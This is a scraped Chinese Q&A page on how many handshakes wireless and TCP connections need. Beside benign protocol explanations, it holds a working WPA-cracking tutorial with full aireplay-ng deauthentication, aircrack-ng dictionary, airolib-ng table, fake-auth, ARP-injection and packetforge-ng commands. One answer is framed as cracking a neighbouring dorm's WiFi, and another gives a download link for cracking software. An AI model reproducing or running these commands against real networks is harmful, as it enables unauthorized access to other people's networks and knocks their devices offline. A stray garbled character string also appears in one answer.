当前位置:首页 » 无线网络 » 无线网络认证需几次握手
扩展阅读
网络信号丢失怎么找回 2025-05-15 03:05:46
为什么视频网站会烧钱 2025-05-15 02:49:05

无线网络认证需几次握手

发布时间: 2022-05-23 09:00:11

① 无线网密码的一些问题~!

上次微软亚洲工程院来学校做报告的时候,听说有的Windows Mobile 5机型有无线网卡,支持802.11b协议(wifi)。当时就觉得非常有意思,于是WIFI成了这次购买PPC Phone的一个考虑指标。

总结一下,除了普通的电话功能外,多普达830主要有红外、蓝牙、GPRS、WIFI这几种无线功能。现将我在这几个部分的使用经验与大家分享如下:

1、红外

红外接口是在老一些的手机和笔记本上普遍存在的接口,将两台设备的接口靠近对齐即可传输数据。在蓝牙技术成熟之后已渐渐被淘汰,新款手机很多只有蓝牙没有红外。红外的传输速率大概只有几K到几十K,从笔记本上传一首Mp3到手机上去都是一件很痛苦的事情,并且手机开了红外功能后会很费电。恐怕目前红外只有在手机没有数据线的情况下能发挥一点作用了。

2、蓝牙

蓝牙(Bluetooth)是一种短距离无线通信技术,不过比起红外还是要方便很多。蓝牙传输不用将接口对齐,只要保持一定距离就行了。传输速率蓝牙V1.1、V1.2为723.2kbps,830的V2.0传输速率为2Mbps。目前蓝牙的应用已经非常广泛了,常见的有蓝牙交换名片/传输文件/蓝牙耳机和蓝牙GPS仪器等等。

3、GPRS

GPRS是移动的一种手机数据服务,现在联通也开始在大城市开展和推广它的GPRS业务。830支持的GPRS Class 10传输速率为144Kbp/s,可见是也相当痛苦的速率。比较实用的应用就是上上小网,看看股票、天气预报,查查Email,看看RSS信息。要想看视频还是下下来看吧,所谓的在线观看依我看只是一种不切实际的提法,GPRS若能清晰在线观看那3G就不用上了。

简单的服务却有复杂的资费。我在网上看到过新闻说有人用GPRS下了些视频竟然花费了1000多元话费。可能很多人会觉得不可思议,但其实在无套餐状态下30元/M的资费标准要解释这笔费用是说得通的。

为了让大家来能分辨手机上网的计费标准,结合多普达830使用时的一些选项,这里给出几点说明:

CMNET与CMWAP

移动的GPRS分CMNET与CMWAP两种接入点。CMNET的速度相对比较快,除了WAP网页,还能直接上WWW网页,资费非常贵。以我的动感地带为例,最便宜的套餐是15元7.5MB,而包月是120元/月。我们还可以通过上面出现那种GPRS资费超出1000元的情况推断流量费超出120元是不会自动包月的,Faint!!!CMWAP速度比较慢,能直接上WAP网页,WAP网页内容有很多移动的SP提供的下载图片、铃声的服务,在我眼中是骗取信息费的流氓网页,性价比极差。而上WWW网页需要通过代理10.0.0.172:80来上,速度自然不如CMNET。不知为什么,有些网络应用程序如官方的MSN、QQ只支持CMNET不支持CMWAP,难道是帮移动赚钱。只有通过第三方的JAVA QQ来解决。CMWAP唯一的好处是资费便宜,10元包月。

GPRS和CSD

WAP是一种无线网络应用协议,而GPRS是实现WAP应用的一种网络传输技术方式。WAP现在有两种承载方式,一是CSD(电路交换数据传送方式),二是GPRS方式(通用无线分组业务)。CSD必须基于GSM电路交换,通过拨号17266或17201接入WAP服务,传输速率9.6Kbps,因为要占用电话电路,使用时无法接收来电。CSD是按时间收费,一般0.15元/分钟。而GPRS是按流量收费(具体的上面已经介绍了),不会影响打进和呼出电话。

PAP和CHAP

GPRS设置中的PAP鉴权和CHAP鉴权是目前的在PPP中普遍使用的认证协议。PAP全称为Password Authentication Protocol,是简单二次握手身份验证协议。PAP下用户名和密码明文传送,安全性低;CHAP全称为Challenge Handshake Authentication Protocol,是一种挑战响应式协议。三次握手身份验证,口令信息加密传送,安全性高。

以上是830 GPRS上网可能会遇到的和需要了解的一些问题,的具体的设置和应用有空的时候再附图说明吧。

4、WIFI

WIFI全称Wireless Fidelity,又称802.11b标准,就是IEEE定义的一个无线网络通信的工业标准。它的传输速度可以达到11Mbps,有效距离也很长,与已有的各种802.11 DSSS设备兼容。其实就是在手机中加入了无线网卡,跟笔记本接入无线网是一回事。目前有的学校、宾馆、咖啡厅、水吧、机场都有无线网络覆盖,其实如果你家里的ADSL使用无线路由,也是可以连上接入Internet的。另外如果笔记本有无线网卡,在手机与电脑之间同步资料、传输文件是非常方便的。830上WIFI的典型应用有GGTV,可以收看电视直播或者各种视频、音频;Google Map手机版也挺不错;访问各种网页,速度很快,跟电脑没多大区别,只是屏幕小需要拖动滚动条;上网聊天及收发电子邮件也是非常顺畅的。只是WIFI非常费电,电池仍旧是一个瓶颈。

② Wifi网络中,在传输数据前通常需要进行( )次握手,以建立无线通信网络连接

这个啊!看用什么加密方式了,不过基本上都相同的,需要四次握手。
3.4.1 WPA-PSK 初始化工作
使用 SSID 和passphares使用以下算法产生PSK 在WPA-PSK 中PMK=PSK
PSK=PMK=pdkdf2_SHA1(passphrase,SSID,SSID length,4096)
3.4.2 第一次握手
AP广播SSID,AP_MAC(AA)→STATION
STATION 端
使用接受到的SSID,AP_MAC(AA)和passphares使用同样算法产生PSK
3.4.3 第二次握手
STATION 发送一个随机数SNonce,STATION_MAC(SA)→AP
AP端
接受到SNonce,STATION_MAC(SA)后产生一个随机数ANonce
然后用PMK,AP_MAC(AA),STATION_MAC(SA),SNonce,ANonce 用以下算
法产生PTK
PTK=SHA1_PRF(PMK, Len(PMK), "Pairwise key expansion",MIN(AA,SA) ||
Max(AA,SA) || Min(ANonce,SNonce) || Max(ANonce,SNonce))
提取这个PTK 前16 个字节组成一个MIC KEY
3.4.4 第三次握手
AP发送上面产生的ANonce→STATION
STATION 端
用接收到ANonce 和以前产生PMK,SNonce,AP_MAC(AA),STATION_MAC(SA)
用同样的算法产生PTK。
提取这个PTK 前16 个字节组成一个MIC KEY
使用以下算法产生MIC值
用这个MIC KEY 和一个802.1x data 数据帧使用以下算法得到MIC值
MIC = HMAC_MD5(MIC Key,16,802.1x data)
3.4.5 第四次握手
STATION 发送802.1x data ,MIC→AP
STATION 端
用上面那个准备好的802.1x 数据帧在最后填充上MIC值和两个字节的0(十六进
制)让后发送这个数据帧到AP。
AP端
收到这个数据帧后提取这个MIC。并把这个数据帧的MIC部分都填上0(十六进
制)这时用这个802.1x data 数据帧,和用上面AP产生的MIC KEY 使用同样的
算法得出MIC’。如果MIC’等于STATION 发送过来的MIC。那么第四次握手成
功。若不等说明则AP 和STATION 的密钥不相同,或STATION 发过来的数据帧
受到过中间人攻击,原数据被篡改过。握手失败了。

如何破解隔壁宿舍的无线网络

WPA加密方式正在保护无线网络!WPA(或许也叫WPA2)是目前最常见的无线局域网加密协议,一般家庭使用的是WPA-PSK模式,其中PSK是指预共享密钥的意思,我们这里不讨论WPA-PSK的工作原理,我来谈谈关于入侵这类型加密的原理。
通俗一点说,就是破解Wi-Fi密码,不知觉的进入别人的内网进行活动。那么怎样破解密码呢?
破解WPA-PSK密码分为两个部分:抓包和脱机暴力攻击。抓包是指获取握手包,WPA加密方式包含四次握手,四次握手允许客户端(也就是手机、笔记本等通过无线网络连接的设备。)和AP(接入点,可以理解为网络入口或者路由器。)对无线传送的流量进行加密,所以握手包里面会包含密文。四次握手发生在客户端与AP的认证过程中,例如你打开手机的Wi-Fi功能后,手机显示“验证身份”、“正在获取IP地址”,其实在这几秒钟内,手机与AP正在发生四次握手。
这几秒钟非常重要,黑客通过计算机网卡截获这些数据包,并保存下来,这就完成了抓包的过程。
但是这里有一个问题,这种抓包方式太被动了,因为要恰好碰上客户端接上网络的瞬间,时间只有仅仅的几秒,这会让黑客失去耐心。
不过有时候失去耐心反而是最好的,因为黑客会想方设法的让客户端重新进行四次握手的过程。如何让客户端重新连接网络呢?就是踢他下线!
通过802.11拒绝服务攻击,可以让一个客户端断线。原理就是黑客的计算机网卡发送一组“解除认证数据包”给客户端,这时客户端就会断开与AP的连线,并且重新进行四次握手,这样黑客就能完成抓包的过程。
但是,想要抓取四次握手的数据包并非易事,需要多次的尝试,这意味着黑客需要不断的发送“解除认证数据包”,有的时候一个“解除认证数据包”就完事了,也有的时候,几十万个“解除认证数据包”也不能让黑客得到握手包。所以,拒绝服务攻击常常被形象的称为洪水般的攻击。
你应该注意到了,四次握手的对象是AP与客户端,也就意味着如果没有客户端,那么黑客将束手无策,至少他不得不费更多的时间。也就是说,如果家庭开着路由器,但是没有手机、笔记本等连接这个网络,那么对于黑客来说,这不是攻击WPA的好时机!黑客会懊恼的发现,在显示屏的DATA(数据包)那一栏的数值永远是0。

成抓包,剩下的任务就是脱机暴力攻击,这个过程不需要与网络进行交互,也就是说黑客只需要保存这个握手包,他就可以在地球任一个角落进行暴力攻击。这也解
释了脱机的意思。暴力攻击也称为字典攻击,原理是通过事先保存的密码表一一验算这个握手包包含的密文,这个密码表形象称为字典,为什么?因为这个密码表非
常大,包含了常见的密码组合。
但是WPA-PSK的密文十分具有挑战性,如果密码组合十分复杂,你会发现即使花了大量的时间,但还在原地踏步。不巧的是,如果密码表不包含真正的密码,那么就意味着暴力攻击失效了。
目前缓解这种压力的方法有两个,第一就是增加密码表的容量,使它能够组合出真正的密码,第二就是加快验证速度,缩短等待时间。目前个人电脑的中央处理器每秒钟能够破解200个密码左右,而利用高性能的显卡能够达到每秒钟10000个密码左右的速度。不过令人懊恼的是,一份普通的密码表就包含2的18次方个密码,跑完整套密码表需要很多时间。

总结一下,破解WPA密码包含两个过程,首先是获得握手包,然后再暴力攻击这个握手包从而获得密码。事实上,这两个过程非常耗时间,只要密码足够复杂,那么要破解WPA可以认为是不可能。

谈谈个人温馨提示:
也许你想尝试破解WPA密码,在网上搜索你就会发现很多密码破解的教程。但是千万不要被那些花俏的语言迷惑了你,那些多种多样的教程本质上就是上文提到的两个过程。我查阅了相关资料,截至2012年(书的出版日期),已知的攻击WPA的方法只有这一个,所以你还是别太相信网络上面的教程。
另外,不要下载网上的关于破解WPA的软件,因为那都是骗人的。目前Windows操作系统不支持网卡监控模式(也叫战争模式。),而网卡只有处于监控模式才能截取到握手包,也就意味着在Windows平台一般是不能完成抓包工作的。所以网上的关于破解Wi-Fi密码这一类软件十有八九都是假的。
这里简略的说说破解过程。一般完成抓包工作需要Linux操作系统,经典的是使用BT3操作系统或者BEMEI奶瓶操作系统。这就需要你有一定的在计算机安装操作系统的知识,以及关于Linux命令行的知识,这里我就不详谈,你可以网络一下关于BT3、奶瓶操作系统的教程。而脱机暴力攻击可以在任何平台完成,即使在Windows操作系统下也可以完成的,这些你也可以网络一下。

不得不告诉你,WPA密码十分具有挑战性,破解这类密码没有百分百的把握,前提是密码表包含了真正的密码。所以家庭里面不用担心有人蹭网了,只要密码足够复杂,那么黑客是很难通过这种方法破解WPA密码,所以说啊,WPA是目前最好的网络加密方法。

尽管WPA足够安全,但是黑客早已失去了对WPA的兴趣,现在最新的攻击是绕过WPA机制,转而对客户端的攻击,通过软件漏洞、ARP欺诈、DNS拒绝服务等等进而有机可乘。不过你不用担心,因为要完成这些工作需要很长的时间,如果没有十分重要的目的,很少人会有耐心做这些事情。电影里面的黑客也许很厉害,但是每一次的攻击其实是很费时间的,那些点点键盘,说几句专业术语就破解了密码的场景,其实都是骗你的......没有你想象中那么简单。

小神

④ 如果破解WPA格式的无线网络密码~~

WPA破解详细教程
破解 WPA 的前提:必须要有合法无线客户端
WPA 破解的原理:
利用Deauth验证攻击。也就是说强制让合法无线客户端与AP被断开,当它被从WLAN 中断开后,这个无线
客户端会自动尝试重新连接到AP上,在这个重新连接过程中,数据通信就产生了,然后利用airomp捕获
一个无线路由器与无线客户端四次握手的过程,生成一个包含四次握手的cap包。然后再利用字典进行暴力
破解。
1. 激活网卡,并让其工作于11信道
Airmon-ng start wifi0 11
2.捕获11信道的cap包,并保存cap包为123.cap
Airomp-ng –w 123 –c 11 wifi0
上图可以看出采用了WPA加密方式,并且有一个0016b69d10ad合法的无线客户端。
3. 进行Deauth验证攻击,强制断开合法无线客户端和AP直接的连接,使其重新进行连接
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解释:-0指的是采取Deautenticate攻击方式,后面为发送次数。-c建议还是使用,效果会更好,这个后面跟
的是监测到的合法的已连接的客户端MAC地址
注意上图红色部分,-c后面为合法无线客户端的MAC地址
Deauth攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行(WPA破解不用等到数据Data达到
几万,因为它只要一个包含WPA4次握手验证包就可以了)。如果成功捕获会出现下图红色部分的提示
中国无线论坛中卫出品
AnywhereWLAN!! 25
这时如果输入dir就可以在root目录下看到名为123.cap的握手包了。
得到握手包以后就可以用字典直接破解
首先将在windows下用字典工具生成的字典(例password.txt)拷贝到root目录下
在BT3桌面双击system然后出现下图。
图中左边红色就为root目录,图中红色存储介质双击打开以后就看到你的每个硬盘的分区了。可以进入硬
盘分区右键拷贝,然后进入root目录右键粘贴。如下图红色部分
目前WPA 的破解主要还是基于暴力破解和字典破解,暴力破解和字典破解的一个共性就是“耗时、费力、
运气”所以往往有时候你花了很多时间但还是破不了,这时候希望大家还是要接受这样一个残酷的现实。
中国无线论坛中卫出品
AnywhereWLAN!! 26
破解方式一:用Cap数据包直接暴力破解
从破解难度上讲WEP 是很容易破解的,只要你收集足够的Cap 数据包就肯定可以破解。WPA 的破解需要
有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。
输入:aircrack-ng -z –b <ap mac> 123*.cap
123 是前面所获得的握手包的文件名。系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,系
统会自动分成几个文件存储并自动命名,可以使用ls查看),输入123*是打开所有123相关的cap文件。
常见问题:步骤2中收集数据包已达30W,无法破解密码。可能系统自动分成了几个文件贮存cap包。
如输入123-01.cap破解可能导致破解不成功,建议使用123*.cap选择所有的cap包进行破解。
中国无线论坛中卫出品
AnywhereWLAN!! 27
破解方式二. 挂字典破解
一.直接在BT3中挂字典破解
aircrack-ng –w password.txt –b <ap mac> 123.cap
参数说明:passwrod.txt为字典名称123.cap为步骤2中获得的握手信息包
耗时1分31秒获得WPA密码,如下图
从上图可以看出破解用时1分31秒,速度149.91K/S
注:本教程只为了描述破解的过程。我是做了个256K的小字典,事先把密码已经加到字典里了。
二.也可以把包含4次握手的CAP数据包拷贝到硬盘下在WIN下用WinAircrack挂字典破解。
中国无线论坛中卫出品
AnywhereWLAN!! 28
如上图 Encryption type处选择WPA-PSK,下面capture files处导入抓取的握手包123.cap
然后选择WPA选项,如下图
在上图中Dictionary file处导入字典文件password.txt。然后点击右下角的Aircrack the key
中国无线论坛中卫出品
AnywhereWLAN!! 29
然后出现下图提示
上图,选择1后回车,然后开始破解。成功破解如下图
从上图可以看出破解用时54秒,速度251.73K/S(比BT3下要快)
中国无线论坛中卫出品
AnywhereWLAN!! 30
三.通过airolib构建WPA table实现WPA线速破解
WPA的字典破解除了直接挂字典破解外,另外一种就是用airolib将字典构造成WPA table然后再用aircrac
进行破解。
构建WPA table就是采用和WPA加密采用同样算法计算后生成的Hash 散列数值,这样在需要破解的时候直
接调用这样的文件进行比对,破解效率就可以大幅提高。
先讲通过airolib构建WPA table
WPA table具有较强的针对ssid的特性。
1. 在构建WPA table之前需要准备两个文件:一个是ssid列表的文件ssid.txt,一个是字典文件
password.txt。下图为我的文件
大家可以看到两个txt的文件,ssid记事本里是ssid的列表,你可以增加常见的ssid进去,后面的passwrod
就是字典文件了。
2. 把这ssid.txt和password.txt还有上面抓到的握手包123.cap这三个文件拷贝到root目录下方便使用。
见下图
3.开始利用airolib-ng来构建WPA table了。构建wpa table保存的名字为wpahash(下同)
第一步,如下图
airolib-ng wpa --import essid ssid.txt
中国无线论坛中卫出品
AnywhereWLAN!! 31
第二步,如下图
airolib-ng wpa --import passwd password.txt
第三步,如下图
airolib-ng wpa --clean all
第四步,如下图
airolib-ng wpa --batch
注:这一步要等很久(视字典大小而定,我256K的字典等了有15分钟)
4. 用aircrack来利用WPA table进行破解
Aircrack-ng –r wpahash 123.cap
选择1以后将开始破解。
中国无线论坛中卫出品
AnywhereWLAN!! 32
成功破解将如下图所示
从上图中可以看出耗时00:00:00反正不超过1秒钟,速度42250.00K/S
大家也看到了三种破解方式,直接挂字典中在win下用WinAircrack破解是速度比在BT3下要快。直接挂字典
破解不超过1分钟就破出了密码;利用WPA table破解速度虽然不到一秒,但是构建WPA table却耗费了15分
钟。构建WPA table是很耗时的,但是构建出了包括常见ssid的和相对较大字典的WPA table的话,以后破
解的速度将大大降低。当然没有万能的字典,如果有万能的字典,再构建出一个常见ssid的WPA table的话
那这个预运算数据库是超级超级庞大的。
注:WIN平台下的CAIN软件中的破解器也可用于WEP和WPA的基于暴力和字典的破解,但是其破解速度很慢,
相比aircrack-ng而言不具实用价值。
中国无线论坛中卫出品
AnywhereWLAN!! 33
Aireplay-ng的6种攻击模式详解
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,
从而产生有效ARP request。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3 也无法产生有效ARP
request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。
aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
参数说明:
【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上
网)
【-a】:设置ap的mac
【-c】:设置已连接的合法客户端的mac。如果不设置-c,则断开所有和ap连接的合法客户端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器
-1 fakeauth count 伪装客户端连接
这种模式是伪装一个客户端和AP进行连接。
这步是无客户端的破解的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。
为让AP接受数据包,必须使自己的网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发
送的数据包,IVS 数据将不会产生。用-1 伪装客户端成功连接以后才能发送注入命令,让路由器接受到注
入命令后才可反馈数据从而产生ARP包。
aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时
【-e】:设置ap的essid
【-a】:设置ap的mac
【-h】:设置伪装客户端的网卡MAC(即自己网卡mac)
-2 Interactive 交互模式
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式
1.这种模式主要用于破解无客户端,先用-1建立虚假客户端连接然后直接发包攻击
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
参数说明:
【-2】:交互攻击模式
【-p】设置控制帧中包含的信息(16进制),默认采用0841
【-c】设置目标mac地址
【-b】设置ap的mac地址
【-h】设置伪装客户端的网卡MAC(即自己网卡mac)
2.提取包,发送注入数据包
aireplay-ng -2 –r <file> -x 1024 wifi0
发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,可以选择1024。
中国无线论坛中卫出品
AnywhereWLAN!! 34
-3 ARP-request 注入攻击模式
这种模式是一种抓包后分析重发的过程
这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客
户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效ARP request 才可利用-3
模式注入成功。如果没有任何通信存在,不能得到ARP request.,则这种攻击就会失败。如果合法客户端和
ap之间长时间内没有ARP request,可以尝试同时使用-0 攻击。
如果没有合法客户端,则可以利用-1 建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生
有效ARP request。再通过-3 模式注入。
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
参数说明:
【-3】:arp注入攻击模式
【-b】:设置ap的mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过1024,建议使用512(也可不定义)
-4 Chopchop 攻击模式,用以获得一个包含密钥数据的xor 文件
这种模式主要是获得一个可利用包含密钥数据的xor 文件,不能用来解密数据包。而是用它来产生一个新
的数据包以便我们可以进行注入。
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
参数说明:
-b:设置需要破解的AP的mac
-h:设置虚拟伪装连接的mac(即自己网卡的mac)
-5 fragment 碎片包攻击模式用以获得PRGA(包含密钥的后缀为xor 的文件)
这种模式主要是获得一个可利用PRGA,这里的PRGA 并不是wep key数据,不能用来解密数据包。而是
用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标AP重新广播包,当AP重广播
时,一个新的IVS将产生,我们就是利用这个来破解
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻击模式
【-b】:设置ap的mac
【-h】:设置虚拟伪装连接的mac(即自己网卡的mac)
中国无线论坛中卫出品
AnywhereWLAN!! 35
Packetforge-ng:数据包制造程序
Packetforge-ng <mode> <options>
Mode
【-0】:伪造ARP包
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 –k 255.255.255.255 -l 255.255.255.255
–y<.xor file> -w mrarp
参数说明:
【-0】:伪装arp数据包
【-a】:设置ap的mac
【-h】设置虚拟伪装连接的mac(即自己的mac)
【-k】<ip[:port]>说明:设置目标文件IP和端口
【-l】<ip[:port]>说明:设置源文件IP和端口
【-y】<file>说明:从xor 文件中读取PRGA。后面跟xor 的文件名。
【-w】设置伪装的arp包的文件名
Aircrack-ng:WEP 及WPA-PSK key 破解主程序
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
参数说明:
【-n】:设置WEP KEY 长度(64/128/152/256/512)
aircrack-ng -x -f 2 name-01h.cap
参数说明:
【-x】:设置为暴力破解模式
【-f】:设置复杂程度,wep密码设置为1,wpa 密码设置为2
aircrack-ng -w password.txt ciw.cap
【-w】:设置为字典破解模式,后面跟字典文件,再后面跟是我们即时保存的那个捕获到WPA 验证的抓包
文件。
中国无线论坛中卫出品
AnywhereWLAN!! 36
常见问题荟萃
问题1:我在启动bt3 的时候,输入startx黑屏
解答:在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会,然后出来提示符再输入startx 可进入
win窗口;当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令,同时可用alt+f1 打开
一个shell,alt+f2 打开第二个shell,alt+f3 打开第三个等。关闭窗口用PRINT SCREEN 键
问题2:在BT3中打开kismet 的时候窗口一闪就没了。
解答:首先加载驱ifconfig -a rausb0 开始网卡监听:airmon-ng start rausb0。找到/usr/local/etc/kismet.conf
打开此文件在channelsplit=true下面加入一行source=rt2500,rausb0,monitor
注: wusb54g v4一定是rt2500 ,不是加载驱动时显示的rt2570。
3945 的兄弟加入source=ipw3945,eth0,IPW3945

⑤ 为什么无线AP,设置wpa-psk eap 802.1x然后抓包里面都是open system

ap和电脑之间的wpa psk的认证流程是这样的:

  1. AP定期发送beacon数据包beacon包里面包含无线网络的名称 这样电脑就能搜索到AP了,并且beacon里面也包含了是否支持wpa

  2. 电脑向AP发送AUTH包。AUTH认证类型有两种,0为开放式、1为共享式(WPA/WPA2必须是开放式),所以如果是wpa模式 那认证类型就是0

  3. AP回应AUTH包

  4. 电脑AP发送associationrequest包

  5. AP回应associationrequest包

  6. 重点来了 下面进行最重要的密码认证过程 即4次握手

    6.1 AP端产生PSK。psk的生成 是以 wifi密码+无线网络名称等参数通过sha1算法生成的。AP同时会发送一个eapol包给电脑 里面包含了无线网络名称和无线网络mac地址等参数 ,这是第一次发eapol包

6.2电脑端根据收到的无线网络名称加上wifi密码等参数通过sha1算法产生同样的psk. 电脑同时产生一个随机数 加上自己的mac地址,放到eapol包里面发给AP

6.3 AP收到包后,也产生一个随机数 ,ap把自己产生的随机数和收到的随机数 加上自己的mac地址 电脑的mac地址 和PSK,生成一个PTK。AP把自己产生的随机数放到eapol里发给电脑。

6.4 电脑收到包后,提取出来随机数 加上刚才6.2自己产生的随机数 以及 mac地址和psk 信息,生成同样的PTK。这样双方一模一样的PTK都有了,这时候电脑就会用PTK加密一个数据 放在eapol包里 发给AP

6.5 ap收到这个eapol包后 如果解密成功 那么就可以正常上网了,如果解密失败 说明你电脑上输入的密码不对 需要重新输入密码 然后重复进行上面的过程 直到你输入正确的路由器密码。

⑥ TCP/IP需要几次握手

1. TCP IP建立连接需要三次握手,断开连接需要四次挥手
在TCP层,有个FLAGS字段,这个字段有以下几个标识:SYN, FIN, ACK, PSH, RST, URG。
其中,对于我们日常的分析有用的就是前面的五个字段。
它们的含义是:
SYN表示建立连接,
FIN表示关闭连接,
ACK表示响应,
PSH表示有 DATA数据传输,
RST表示连接重置。

⑦ 公共场所连接wifi热点,会不会泄露隐私

在公共场所通常我是不推荐使用公共WIFI的,因为现在很多路由都可以装商业插件,或是商业WIFI产品,他们都可以手机用户的个人信息。在这种情况下是非常容易泄露隐私的。如果某人在路由上做了手脚,他是可以监控你所有操作的,甚至拦截你的各种数据信息,这对隐私而言已经没有什么安全可言了。甚至可以直接往你手机上移植木马。可能你会说哪有这么多高手,但我要告诉你的是,100次你遇到1次,你就有可能损失惨重,切忌公共WIFI 不要操作重要软件。

⑧ 无线网设置WPA2密码怎么破解呢

下载地址破解http://www.pc6.com/softview/SoftView_128.html

在动手破解WPA/WPA2前,应该先了解一下基础知识,本文适合新手阅读
首先大家要明白一种数学运算,它叫做哈希算法(hash),这是一种不可逆运算,你不能通过运算结果来求解出原来的未知数是多少,有时我们还需要不同的未知数通过该算法计算后得到的结果不能相同,即你不太可能找到两个不同的值通过哈希得到同一个结果。哈希是一类算法的统称,通常哈希算法都是公开的,比如MD5,SHA-1等等。;

我们平时说的WPA密码其实叫PSK(pre-shared key),长度一般是8-63字节,它加上ssid通过一定的算法可以得到PMK(pairwise master key)。PMK=SHA-1(ssid,psk) ,PMK的长度是定长的,都是64字节。由于计算PMK的过程开销比较大,是我们破解花费时间长的关键,所以采用以空间换时间的原则把PMK事先生成好,这个事先生成好的表就是常说的HASH表(生成PMK的算法是一种哈希),这个工作就是用airlib-ng这个工具来完成的,我们的快速破解就是这么来的。

认证的时候会生成一个PTK(pairwise temporary),这是一组密钥,具体细节不详细说了,它的生成方法也是采用的哈希,参数是连接的客户端MAC地址、AP的BSSID、A-NONCE、S-NONCE、PMK,其中A-NONCE和S-NONCE是两个随机数,确保每次连接都会生成不同的PTK。PTK的计算消耗很小。PTK加上报文数据采用一定的算法(AES或TKIP),得到密文,同时会得到一个签名,叫做MIC(message integrality check),tkip之所以被破解和这个mic有很大关系。
四次握手包中含有以上的哪些东西呢?客户端的MAC地址,AP的BSSID,A-NONCE,S-NONE,MIC,最关键的PMK和PTK是不包含在握手包里的!
8 A2 m6 T& }) U2 J认证的原理是在获得以上的所有参数后,客户端算出一个MIC,把原文连同MIC一起发给AP,AP采用相同的参数与算法计算出MIC,并与客户端发过来的比较,如果一致,则认证通过,否则失败。

目前的破解方法是我们获得握手包后,用我们字典中的PSK+ssid先生成PMK(如果有HASH表则略过),然后结合握手包中的(客户端MAC,AP的BSSID,A-NONCE,S-NONCE)计算PTK,再加上原始的报文数据算出MIC并与AP发送的MIC比较,如果一致,那么该PSK就是密钥。
目前最耗时的就是算PMK,可谓破解的瓶颈。即使搞定了运算量的问题,海量的密钥存储也是个问题(PMK都是64字节长度)!
最近出来的tkiptun-ng只是可以解开使用tkip加密了的数据包,并不是说能够快速算出PMK或PSK。如果感兴趣,可以到书店看看讲哈希的书,说不定你把这些HASH算法都破解出来了。

wpa_supplicant套件中有个小工具,叫做wpa_passphrase,它和airolib-ng的作用差不多,都是用来生成PMK,在backtrack中应该自带这个工具。比如有个ssid为TP-LINK,PSK是12345678,那么生成PMK的方法就是wpa_passphrase TP-LINK 12345678,结果应该是这样:
network={ ssid="TP-LINK"
#psk="12345678"
psk=
psk=其实就是PMK了,一般在电脑上运行查看无线密码的软件就是得到这个,把直接输入到无线客户端中就可以连上该ssid,相当于输入了12345678,生成PMK的过程是不可逆的,即无法通过来逆推得到12345678。可以看到同样是psk是12345678,如果ssid名字改变,那么pmk就会发生改变,这就是为什么用airolib-ng建表是只能按ssid生成。

⑨ tcp终止连接需要几次握手

TCP连接和终止:建立一个连接需要三次握手,而终止一个连接要经过四次握手,这是由TCP的半关闭(halfclose)造成的。